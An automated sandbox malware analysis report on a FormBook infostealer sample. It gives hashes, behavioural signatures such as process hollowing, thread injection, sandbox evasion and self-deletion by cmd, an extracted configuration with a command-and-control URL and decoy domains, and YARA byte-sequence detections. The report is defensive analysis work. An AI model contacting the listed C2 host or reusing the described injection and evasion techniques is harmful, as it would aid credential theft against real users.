Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Fp4grWelSC.exe

Overview

General Information

Sample Name:Fp4grWelSC.exe
Analysis ID:552852
MD5:0e99d13aafcc5e8fadc45d8b85336d9b
SHA1:6573c9dd229e50981aa24128ad02a07e99805369
SHA256:a15402c5f869a1c02421742c27dd71c2448bb037d391a6bf130be06b2f976e2f
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Fp4grWelSC.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\Fp4grWelSC.exe" MD5: 0E99D13AAFCC5E8FADC45D8B85336D9B)
    • Fp4grWelSC.exe (PID: 6436 cmdline: C:\Users\user\Desktop\Fp4grWelSC.exe MD5: 0E99D13AAFCC5E8FADC45D8B85336D9B)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 6860 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • cmd.exe (PID: 7036 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 7080 cmdline: /c del "C:\Users\user\Desktop\Fp4grWelSC.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • explorer.exe (PID: 5396 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • explorer.exe (PID: 3460 cmdline: explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.safetyeats.asia/pnug/"], "decoy": ["natureate.com", "ita-pots.website", "sucohansmushroom.com", "produrielrosen.com", "gosystemupdatenow.online", "jiskra.art", "janwiench.com", "norfolkfoodhall.com", "iloveaddictss.com", "pogozip.com", "buyinstapva.com", "teardirectionfreedom.xyz", "0205168.com", "apaixonadosporpugs.online", "jawscoinc.com", "crafter.quest", "wikipedianow.com", "radiopuls.net", "kendama-co.com", "goodstudycanada.com", "huzhoucs.com", "asinment.com", "fuchsundrudolph.com", "arthurenathalia.com", "globalcosmeticsstudios.com", "brandrackley.com", "freemanhub.one", "utserver.online", "fullspecter.com", "wshowcase.com", "airjordanshoes-retro.com", "linguimatics.com", "app-verlengen.icu", "singpost.red", "j4.claims", "inoteapp.net", "jrdautomotivellc.com", "xn--beaupre-6xa.com", "mypolicyportal.net", "wdgjdhpg.com", "anshulindla.com", "m981070.com", "vertentebike.com", "claim-available.com", "buyfudgybombs.com", "adfnapoli.com", "blackfuid.com", "clambakedelivered.info", "marketingworksonhold.com", "xvyj.top", "richardsonsfinest.com", "gurimix.com", "dorhop.com", "mauigrowngreencoffee.net", "juzytuu.xyz", "pokorny.industries", "floridapermitsolutions.com", "right-on-target-store.com", "ynaire.com", "nextpar.com", "disdrone.com", "fruitfulvinebirth.com", "africanfairytale.com", "leisuresabah.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.Fp4grWelSC.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.Fp4grWelSC.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.Fp4grWelSC.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        4.0.Fp4grWelSC.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.0.Fp4grWelSC.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 25 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.safetyeats.asia/pnug/"], "decoy": ["natureate.com", "ita-pots.website", "sucohansmushroom.com", "produrielrosen.com", "gosystemupdatenow.online", "jiskra.art", "janwiench.com", "norfolkfoodhall.com", "iloveaddictss.com", "pogozip.com", "buyinstapva.com", "teardirectionfreedom.xyz", "0205168.com", "apaixonadosporpugs.online", "jawscoinc.com", "crafter.quest", "wikipedianow.com", "radiopuls.net", "kendama-co.com", "goodstudycanada.com", "huzhoucs.com", "asinment.com", "fuchsundrudolph.com", "arthurenathalia.com", "globalcosmeticsstudios.com", "brandrackley.com", "freemanhub.one", "utserver.online", "fullspecter.com", "wshowcase.com", "airjordanshoes-retro.com", "linguimatics.com", "app-verlengen.icu", "singpost.red", "j4.claims", "inoteapp.net", "jrdautomotivellc.com", "xn--beaupre-6xa.com", "mypolicyportal.net", "wdgjdhpg.com", "anshulindla.com", "m981070.com", "vertentebike.com", "claim-available.com", "buyfudgybombs.com", "adfnapoli.com", "blackfuid.com", "clambakedelivered.info", "marketingworksonhold.com", "xvyj.top", "richardsonsfinest.com", "gurimix.com", "dorhop.com", "mauigrowngreencoffee.net", "juzytuu.xyz", "pokorny.industries", "floridapermitsolutions.com", "right-on-target-store.com", "ynaire.com", "nextpar.com", "disdrone.com", "fruitfulvinebirth.com", "africanfairytale.com", "leisuresabah.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Fp4grWelSC.exeVirustotal: Detection: 30%Perma Link
          Source: Fp4grWelSC.exeReversingLabs: Detection: 39%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.Fp4grWelSC.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Fp4grWelSC.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Fp4grWelSC.exe.398d3e0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Fp4grWelSC.exe.39e3c00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: www.safetyeats.asia/pnug/Avira URL Cloud: Label: malware
          Machine Learning detection for sampleShow sources
          Source: Fp4grWelSC.exeJoe Sandbox ML: detected
          Source: 4.0.Fp4grWelSC.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.Fp4grWelSC.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.Fp4grWelSC.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.Fp4grWelSC.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Fp4grWelSC.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Fp4grWelSC.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Fp4grWelSC.exe, 00000004.00000002.764180454.00000000014F0000.00000040.00000001.sdmp, Fp4grWelSC.exe, 00000004.00000002.764319659.000000000160F000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942277980.0000000003230000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942585836.000000000334F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: Fp4grWelSC.exe, 00000004.00000002.766071483.00000000035D0000.00000040.00020000.sdmp, cmd.exe, 0000000B.00000000.763461139.00000000011D0000.00000040.00020000.sdmp, cmd.exe, 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Fp4grWelSC.exe, 00000004.00000002.764180454.00000000014F0000.00000040.00000001.sdmp, Fp4grWelSC.exe, 00000004.00000002.764319659.000000000160F000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942277980.0000000003230000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942585836.000000000334F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdb source: Fp4grWelSC.exe, 00000004.00000002.766071483.00000000035D0000.00000040.00020000.sdmp, cmd.exe, cmd.exe, 0000000B.00000000.763461139.00000000011D0000.00000040.00020000.sdmp, cmd.exe, 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011F31DC FindFirstFileW,FindNextFileW,FindClose,11_2_011F31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_011D85EA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,11_2_011E245C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,11_2_011DB89C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,11_2_011E68BA

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.safetyeats.asia/pnug/
          Source: explorer.exe, 00000016.00000003.897084058.0000000004691000.00000004.00000001.sdmp, explorer.exe, 00000016.00000003.871772887.000000000466C000.00000004.00000001.sdmp, explorer.exe, 00000016.00000003.872046456.000000000466C000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.873076198.0000000004691000.00000004.00000001.sdmp, explorer.exe, 00000016.00000003.894500813.0000000004691000.00000004.00000001.sdmp, explorer.exe, 00000016.00000003.906108816.0000000004691000.00000004.00000001.sdmp, explorer.exe, 00000016.00000003.892662524.0000000004691000.00000004.00000001.sdmp, explorer.exe, 00000016.00000003.872317477.000000000468E000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000016.00000000.872239876.00000000045CB000.00000004.00000001.sdmpString found in binary or memory: http://crl.v
          Source: Fp4grWelSC.exe, 00000000.00000003.665336360.0000000005616000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000003.665368035.0000000005615000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000003.665301008.0000000005615000.00000004.00000001.sdmpString found in binary or memory: http://en.wV
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Fp4grWelSC.exe, 00000000.00000003.667689980.0000000005617000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Fp4grWelSC.exe, 00000000.00000003.667936294.0000000005616000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Fp4grWelSC.exe, 00000000.00000003.671658171.000000000564D000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000003.671734893.000000000564D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Fp4grWelSC.exe, 00000000.00000003.673630049.000000000564D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Fp4grWelSC.exe, 00000000.00000002.688934459.0000000000D97000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: Fp4grWelSC.exe, 00000000.00000002.688934459.0000000000D97000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comas
          Source: Fp4grWelSC.exe, 00000000.00000002.688934459.0000000000D97000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comldW
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000003.667467039.0000000005614000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Fp4grWelSC.exe, 00000000.00000003.676276050.0000000005646000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000003.676246333.0000000005646000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Fp4grWelSC.exe, 00000000.00000003.667875691.0000000005616000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000002.692388832.0000000006822000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000003.667936294.0000000005616000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Fp4grWelSC.exe, 00000000.00000003.667875691.0000000005616000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnew

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.Fp4grWelSC.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Fp4grWelSC.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Fp4grWelSC.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Fp4grWelSC.exe.398d3e0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Fp4grWelSC.exe.39e3c00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.Fp4grWelSC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Fp4grWelSC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.Fp4grWelSC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Fp4grWelSC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.Fp4grWelSC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Fp4grWelSC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.Fp4grWelSC.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Fp4grWelSC.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.Fp4grWelSC.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Fp4grWelSC.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Fp4grWelSC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Fp4grWelSC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.Fp4grWelSC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Fp4grWelSC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Fp4grWelSC.exe.398d3e0.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Fp4grWelSC.exe.398d3e0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
